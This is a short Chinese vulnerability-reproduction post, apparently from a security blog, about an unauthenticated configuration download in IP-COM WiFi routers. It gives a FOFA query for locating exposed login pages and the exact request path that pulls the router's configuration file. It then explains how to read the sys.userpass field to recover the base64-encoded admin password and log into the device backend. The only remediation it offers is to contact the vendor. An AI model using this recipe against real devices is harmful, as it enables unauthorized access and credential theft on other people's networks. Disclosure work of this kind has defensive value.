【漏洞复现】和为顺IP-COM WiFi未授权下载漏洞

Nx01 产品简介

        深圳市和为顺网络技术有限公司是一家聚焦于商用级网络通信设备的研发与应用,为全球中小型企业提供高速、安全、易维护的网络设备产品和解决方案的公司。

Nx02 漏洞描述

        深圳市和为顺网络技术有限公司IP-COM WiFi方案解决专家存在任意文件下载漏洞,攻击者可利用漏洞获取敏感信息。

Nx03 产品主页

fofa-query: web.title=="IP-COM | Login"

【漏洞复现】和为顺IP-COM WiFi未授权下载漏洞_第1张图片

Nx04 漏洞复现

POC:

/cgi-bin/DownloadCfg/RouterCfm.cfg

【漏洞复现】和为顺IP-COM WiFi未授权下载漏洞_第2张图片

搜索sys.userpass参数获取base加密密码进行登录后台。

【漏洞复现】和为顺IP-COM WiFi未授权下载漏洞_第3张图片

Nx05 修复建议

建议联系软件厂商进行处理。

你可能感兴趣的:(【漏洞复现】,网络,安全,web安全)